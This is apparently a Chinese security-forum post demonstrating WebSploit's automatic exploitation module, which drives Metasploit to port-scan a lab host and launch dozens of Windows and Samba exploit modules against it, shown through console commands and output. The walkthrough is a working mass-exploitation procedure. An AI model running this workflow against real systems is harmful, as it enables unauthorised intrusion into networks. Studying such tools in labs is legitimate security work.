切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
181 WebSploit 3 自动溢出[复制链接]
发表于 2012-10-2 15:57:02 | 显示全部楼层 |!read_mode!
  1. root@Dis9Team:/pen/WebSploit# ./websploit

  2.         ID & Name                         Description
  3.         ------------                        --------------
  4.         [1]WebSite Attack Vector         Scanners,Crawlers For WebSite
  5.         [2]Network Attack Vector         Network Attack Tools
  6.         [3]Automatic Exploiter                 Automatic Exploit Vulnerability
  7.         [4]Format Infector                 Inject Custom Payload Into File Formats
  8.         [5]Web Tools                         WebSite Tools

  9.         [88]Update                         Update WebSploit Toolkit
  10.         [99]Exit                         Exit


  11. wsf > 3 # 选择模块

  12.         ID & Method                         Description
  13.         ------------                        --------------
  14.         [1]Service Autopwn                 Automatic Exploite Victim Services
  15.         [2]Browser Autopwn                 HTTP Client Automatic Exploiter

  16.         [99]Main Menu                         Go To Main Menu

  17. wsf:Autopwn > 1  # 选择自动溢出
  18. wsf:Autopwn > Enter Target IP Address : 5.5.5.4  #输入目标地址
  19. [*]Your Target Address : 5.5.5.4
  20. [*]Engine Has Been Started.
  21. [*]Please Wait ...
复制代码
然后自动载入METASPLOIT 在这里出粗
  1.        =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  2. + -- --=[ 901 exploits - 491 auxiliary - 150 post
  3. + -- --=[ 250 payloads - 28 encoders - 8 nops
  4.        =[ svn r15622 updated today (2012.07.12)

  5. [*] Processing /tmp/websploit_autopwn.rc for ERB directives.
  6. resource (/tmp/websploit_autopwn.rc)> workspace -d websploit
  7. [*] Deleted workspace: websploit
  8. resource (/tmp/websploit_autopwn.rc)> workspace -a websploit
  9. [*] Added workspace: websploit
  10. resource (/tmp/websploit_autopwn.rc)> db_nmap 5.5.5.4
  11. [*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2012-07-13 12:33 PDT
  12. [*] Nmap: Nmap scan report for 5.5.5.4
  13. [*] Nmap: Host is up (0.00023s latency).
  14. [*] Nmap: Not shown: 996 closed ports
  15. [*] Nmap: PORT     STATE SERVICE
  16. [*] Nmap: 135/tcp  open  msrpc
  17. [*] Nmap: 139/tcp  open  netbios-ssn
  18. [*] Nmap: 445/tcp  open  microsoft-ds
  19. [*] Nmap: 3389/tcp open  ms-term-serv
  20. [*] Nmap: MAC Address: 08:00:27:7C:3B:F1 (Cadmus Computer Systems)
  21. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
  22. resource (/tmp/websploit_autopwn.rc)> load /tmp/db_autopwn.rb
  23. [*] Successfully loaded plugin: db_autopwn
  24. resource (/tmp/websploit_autopwn.rc)> db_autopwn -t -x -p -e
复制代码
重新输入命令


  1. msf > db_autopwn  -p -e -t
复制代码
等待结果
  1. msf > db_autopwn  -p -e -t
  2. [-] The db_autopwn command is DEPRECATED
  3. [-] See http://r-7.co/xY65Zr instead
  4. [-]
  5. [-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
  6. [-]          This code is not well maintained, crashes systems, and crashes itself.
  7. [-]          Use only if you understand it's current limitations/issues.
  8. [-]          Minimal support and development via neinwechter on GitHub metasploit fork.
  9. [-]
  10. [*] Analysis completed in 8 seconds (0 vulns / 0 refs)
  11. [*]
  12. [*] ================================================================================
  13. [*]                             Matching Exploit Modules
  14. [*] ================================================================================
  15. [*]   5.5.5.4:135  exploit/windows/dcerpc/ms03_026_dcom  (port match)
  16. [*]   5.5.5.4:139  exploit/freebsd/samba/trans2open  (port match)
  17. [*]   5.5.5.4:139  exploit/linux/samba/chain_reply  (port match)
  18. [*]   5.5.5.4:139  exploit/linux/samba/lsa_transnames_heap  (port match)
  19. [*]   5.5.5.4:139  exploit/linux/samba/trans2open  (port match)
  20. [*]   5.5.5.4:139  exploit/multi/ids/snort_dce_rpc  (port match)
  21. [*]   5.5.5.4:139  exploit/multi/samba/nttrans  (port match)
  22. [*]   5.5.5.4:139  exploit/multi/samba/usermap_script  (port match)
  23. [*]   5.5.5.4:139  exploit/netware/smb/lsass_cifs  (port match)
  24. [*]   5.5.5.4:139  exploit/osx/samba/lsa_transnames_heap  (port match)
  25. [*]   5.5.5.4:139  exploit/solaris/samba/trans2open  (port match)
  26. [*]   5.5.5.4:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
  27. [*]   5.5.5.4:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
  28. [*]   5.5.5.4:139  exploit/windows/oracle/extjob  (port match)
  29. [*]   5.5.5.4:139  exploit/windows/smb/ms03_049_netapi  (port match)
  30. [*]   5.5.5.4:139  exploit/windows/smb/ms04_011_lsass  (port match)
  31. [*]   5.5.5.4:139  exploit/windows/smb/ms04_031_netdde  (port match)
  32. [*]   5.5.5.4:139  exploit/windows/smb/ms05_039_pnp  (port match)
  33. [*]   5.5.5.4:139  exploit/windows/smb/ms06_040_netapi  (port match)
  34. [*]   5.5.5.4:139  exploit/windows/smb/ms06_066_nwapi  (port match)
  35. [*]   5.5.5.4:139  exploit/windows/smb/ms06_066_nwwks  (port match)
  36. [*]   5.5.5.4:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
  37. [*]   5.5.5.4:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
  38. [*]   5.5.5.4:139  exploit/windows/smb/ms08_067_netapi  (port match)
  39. [*]   5.5.5.4:139  exploit/windows/smb/ms10_061_spoolss  (port match)
  40. [*]   5.5.5.4:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
  41. [*]   5.5.5.4:139  exploit/windows/smb/psexec  (port match)
  42. [*]   5.5.5.4:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
  43. [*]   5.5.5.4:445  exploit/freebsd/samba/trans2open  (port match)
  44. [*]   5.5.5.4:445  exploit/linux/samba/chain_reply  (port match)
  45. [*]   5.5.5.4:445  exploit/linux/samba/lsa_transnames_heap  (port match)
  46. [*]   5.5.5.4:445  exploit/linux/samba/trans2open  (port match)
  47. [*]   5.5.5.4:445  exploit/multi/samba/nttrans  (port match)
  48. [*]   5.5.5.4:445  exploit/multi/samba/usermap_script  (port match)
  49. [*]   5.5.5.4:445  exploit/netware/smb/lsass_cifs  (port match)
  50. [*]   5.5.5.4:445  exploit/osx/samba/lsa_transnames_heap  (port match)
  51. [*]   5.5.5.4:445  exploit/solaris/samba/trans2open  (port match)
  52. [*]   5.5.5.4:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
  53. [*]   5.5.5.4:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
  54. [*]   5.5.5.4:445  exploit/windows/oracle/extjob  (port match)
  55. [*]   5.5.5.4:445  exploit/windows/smb/ms03_049_netapi  (port match)
  56. [*]   5.5.5.4:445  exploit/windows/smb/ms04_011_lsass  (port match)
  57. [*]   5.5.5.4:445  exploit/windows/smb/ms04_031_netdde  (port match)
  58. [*]   5.5.5.4:445  exploit/windows/smb/ms05_039_pnp  (port match)
  59. [*]   5.5.5.4:445  exploit/windows/smb/ms06_040_netapi  (port match)
  60. [*]   5.5.5.4:445  exploit/windows/smb/ms06_066_nwapi  (port match)
  61. [*]   5.5.5.4:445  exploit/windows/smb/ms06_066_nwwks  (port match)
  62. [*]   5.5.5.4:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
  63. [*]   5.5.5.4:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
  64. [*]   5.5.5.4:445  exploit/windows/smb/ms08_067_netapi  (port match)
  65. [*]   5.5.5.4:445  exploit/windows/smb/ms10_061_spoolss  (port match)
  66. [*]   5.5.5.4:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
  67. [*]   5.5.5.4:445  exploit/windows/smb/psexec  (port match)
  68. [*]   5.5.5.4:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
  69. [*] ================================================================================
  70. [*]
  71. [*]
  72. [*] (1/54 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 5.5.5.4:135...
  73. [*] (2/54 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 5.5.5.4:139...
  74. [*] (3/54 [0 sessions]): Launching exploit/linux/samba/chain_reply against 5.5.5.4:139...
  75. [*] (4/54 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 5.5.5.4:139...
  76. [*] (5/54 [0 sessions]): Launching exploit/linux/samba/trans2open against 5.5.5.4:139...
  77. [*] (6/54 [0 sessions]): Launching exploit/multi/ids/snort_dce_rpc against 5.5.5.4:139...
  78. [*] (7/54 [0 sessions]): Launching exploit/multi/samba/nttrans against 5.5.5.4:139...
  79. [*] (8/54 [0 sessions]): Launching exploit/multi/samba/usermap_script against 5.5.5.4:139...
  80. [*] (9/54 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 5.5.5.4:139...
  81. [*] (10/54 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 5.5.5.4:139...
  82. [*] (11/54 [0 sessions]): Launching exploit/solaris/samba/trans2open against 5.5.5.4:139...
  83. [*] (12/54 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 5.5.5.4:139...
  84. [*] (13/54 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 5.5.5.4:139...
  85. [*] (14/54 [0 sessions]): Launching exploit/windows/oracle/extjob against 5.5.5.4:139...
  86. [*] (15/54 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 5.5.5.4:139...
  87. [*] (16/54 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 5.5.5.4:139...
  88. [*] (17/54 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 5.5.5.4:139...
  89. [*] (18/54 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 5.5.5.4:139...
  90. [*] (19/54 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 5.5.5.4:139...
  91. [*] (20/54 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 5.5.5.4:139...
  92. [*] (21/54 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 5.5.5.4:139...
  93. [*] (22/54 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 5.5.5.4:139...
  94. [*] (23/54 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 5.5.5.4:139...
  95. [*] (24/54 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 5.5.5.4:139...
  96. [*] (25/54 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 5.5.5.4:139...
  97. [*] (26/54 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 5.5.5.4:139...
  98. [*] (27/54 [0 sessions]): Launching exploit/windows/smb/psexec against 5.5.5.4:139...
  99. [*] (28/54 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 5.5.5.4:139...
  100. [*] (29/54 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 5.5.5.4:445...
  101. [*] (30/54 [0 sessions]): Launching exploit/linux/samba/chain_reply against 5.5.5.4:445...
  102. [*] (31/54 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 5.5.5.4:445...
  103. [*] (32/54 [0 sessions]): Launching exploit/linux/samba/trans2open against 5.5.5.4:445...
  104. [*] (33/54 [0 sessions]): Launching exploit/multi/samba/nttrans against 5.5.5.4:445...
  105. [*] (34/54 [0 sessions]): Launching exploit/multi/samba/usermap_script against 5.5.5.4:445...
  106. [*] (35/54 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 5.5.5.4:445...
  107. [*] (36/54 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 5.5.5.4:445...
  108. [*] (37/54 [0 sessions]): Launching exploit/solaris/samba/trans2open against 5.5.5.4:445...
  109. [*] (38/54 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 5.5.5.4:445...
  110. [*] (39/54 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 5.5.5.4:445...
  111. [*] (40/54 [0 sessions]): Launching exploit/windows/oracle/extjob against 5.5.5.4:445...
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-26 09:13

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部